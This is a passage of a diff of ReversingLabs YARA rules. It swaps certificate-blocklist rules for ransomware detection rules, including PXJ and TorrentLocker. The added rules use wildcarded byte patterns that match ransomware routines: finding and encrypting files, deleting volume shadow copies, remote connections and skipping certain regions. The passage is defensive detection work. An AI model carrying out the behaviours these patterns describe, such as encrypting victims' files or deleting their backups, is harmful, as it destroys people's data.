+            ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ??
+            ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
+        }
+		$skip_hk_china_taiwan_p2 = {
+            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? B0 ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 55 ??
+            83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72
+            ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
+            ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ??
+            ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
+            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+            83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8
+            ?? ?? ?? ?? E8
+        }
+		$crypt_files = {
+            8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 89 45 ?? 89
+            4D ?? 56 8B 75 ?? 85 C9 75 ?? 33 C0 E9 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 83 20
+            ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 53 8B C6
+            8B D6 C1 FA ?? 83 E0 ?? 57 6B F8 ?? 89 55 ?? 8B 14 95 ?? ?? ?? ?? 89 7D ?? 8A 5C 3A
+            ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1 F7 D0 A8 ?? 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8
+            ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? F6 44 3A ?? ?? 74 ?? 6A
+            ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 8D 7D ?? AB 56 AB AB E8 ?? ?? ?? ??
+            59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 8B 5D ?? 0F 87 ?? ?? ?? ?? FF 75 ?? 8D 45
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? 8D 45 ?? 53
+            56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 04 8D ?? ?? ?? ?? 80 7C 10
+            ?? ?? 7D ?? 0F BE C3 8B 5D ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 75 ?? FF 75 ??
+            8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB
+            ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 10 ?? 8D 7D ?? 8B 5D ?? 33
+            C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? 53 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 4D ?? 8B 55 ?? 8B 45 ?? 85 C0 75 ??
+            8B 45 ?? 85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 30 EB ?? 50 E8 ?? ?? ?? ?? 59 EB ?? 8B 04 8D ?? ?? ?? ?? F6 44 10 ?? ?? 74
+            ?? 80 3B ?? 75 ?? 33 C0 EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 20
+            ?? 83 C8 ?? EB ?? 2B 45 ?? 5F 5B 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Remedica Medical Education and Publishing Ltd" and ( pe.signatures [ i ] . serial == "00:bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" or pe.signatures [ i ] . serial == "bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" ) and 1387151999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $skip_hk_china_taiwan_p* ) ) and ( all of ( $find_files_* ) ) and ( $crypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3E1656Dfcaacfed7C2D2564355698Aa3 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_PXJ : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects PXJ ransomware."
 		author = "ReversingLabs"
-		id = "57b75eaa-2cb2-5713-8eb3-065f90a1fdd5"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c1549905-5b31-55c0-a275-0ab8133b3504"
+		date = "2020-07-07"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2862-L2878"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.PXJ.yara#L1-L158"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ba7cca8d71f571644cabd3d491cddefffd05ca7a838f262a343a01e4a09bb72a"
+		logic_hash = "e88d27dcd7ad3af459bd7e34fcc827822365441446b0e4e7bbec399c9a948cb7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "PXJ"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "John W.Richard" and pe.signatures [ i ] . serial == "3e:16:56:df:ca:ac:fe:d7:c2:d2:56:43:55:69:8a:a3" and 1385251199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4Bf1D68E926E2Dd8966008C44F95Ea1C : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "c82170a4-911c-5206-bae8-6503a5449df9"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2880-L2896"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "44b5aae8380e3590ebb6e2365e89b3827432e8330e5290dc8f8603a00bcf62f6"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 68 ?? ?? ?? ??
+            33 F6 8D 8D ?? ?? ?? ?? 33 C0 56 51 89 9D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
+            ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 53 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B
+            50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ??
+            3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66
+        }
+		$find_files_p2 = {
+            3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB
+            ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 9F ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF
+            66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ??
+            ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
+            ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D
+            85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3A C1 75 ?? 01 8F ?? ?? ?? ?? 11
+            B7 ?? ?? ?? ?? EB ?? 01 8F ?? ?? ?? ?? 11 B7 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B 4D ?? 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 89 85 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4D
+            ?? 8B 55 ?? 51 52 E8 ?? ?? ?? ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 53 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 51 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 33 F6 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ??
+            46 83 FE ?? 7C ?? 8D 55 ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ??
+            ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 6A ?? 51
+        }
+		$encrypt_files_p2 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 95
+            ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 56
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 85 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
+            8B 3D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50
+            56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52
+            8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D
+            95 ?? ?? ?? ?? 52 56 FF D7 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ??
+            ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 8B 9D
+            ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 D2 52 52 52 33 C9 51 50
+            FF 15 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B C6 8D
+        }
+		$encrypt_files_p3 = {
+            48 ?? 8B FF 66 8B 10 83 C0 ?? 66 85 D2 75 ?? 2B C1 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51
+            8D 14 00 8B 83 ?? ?? ?? ?? 52 56 50 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
+            51 6A ?? 68 ?? ?? ?? ?? 52 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ??
+            8D 4D ?? 51 52 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ??
+            ?? 51 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50
+            51 FF D7 8B B5 ?? ?? ?? ?? 6A ?? 33 C9 51 51 B8 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 33 DB EB ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ??
+            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 83 C4 ?? 52 FF 15 ?? ?? ?? ?? 33 C9 51 51 33 C0 51 50 8B 83 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$delete_volumes_snapshots_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 33 FF 57 57 89
+            85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 57 68 ??
+            ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF
+            D6 57 57 8D 8D ?? ?? ?? ?? 51 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ??
+            6A ?? 57 57 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F
+            84 ?? ?? ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 33 FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D 9B ?? ?? ?? ?? 8A 08 40 84
+            C9 75 ?? 2B C2 57 8D 95 ?? ?? ?? ?? 52 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ??
+            ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 88 0E E8 ?? ?? ?? ?? 8D B5 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ??
+            ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF
+            15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8B FF 66 8B 10 66 3B 11 75 ??
+            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
+        }
+		$delete_volumes_snapshots_p2 = {
+            EB ?? 1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? EB ?? 8D 64 24 ?? 8B BD ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
+            CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A
+            ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 9F ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
+            ?? ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 33
+            FF 57 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72
+            ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 89 B5 ??
+            ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 8C ?? ?? ?? ?? EB ?? 57
+            8D 9F ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Technical and Commercial Consulting Pvt. Ltd." and pe.signatures [ i ] . serial == "4b:f1:d6:8e:92:6e:2d:d8:96:60:08:c4:4f:95:ea:1c" and 1322092799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $delete_volumes_snapshots_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_149C12083C145E28155510Cfc19Db0Fe : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Torrentlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects TorrentLocker ransomware."
 		author = "ReversingLabs"
-		id = "8d9b0b1c-df7c-560a-8d51-bc8738952457"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "64bdb0db-ea0c-5a0d-9d3e-db1df86c132b"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2898-L2914"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TorrentLocker.yara#L1-L98"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f616fc470e223d65ac4c984394a38d566265ab37829ff566012de0a1527396c2"
+		logic_hash = "f1aa523fa95e142b7e421286d26918e3da4bd3e268fef3f98f00820296291bfc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TorrentLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3rd Eye Solutions Ltd" and pe.signatures [ i ] . serial == "14:9c:12:08:3c:14:5e:28:15:55:10:cf:c1:9d:b0:fe" and 1209340799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_77E0117E8B2B8Faa84Bed961019D5Ef8 : INFO FILE
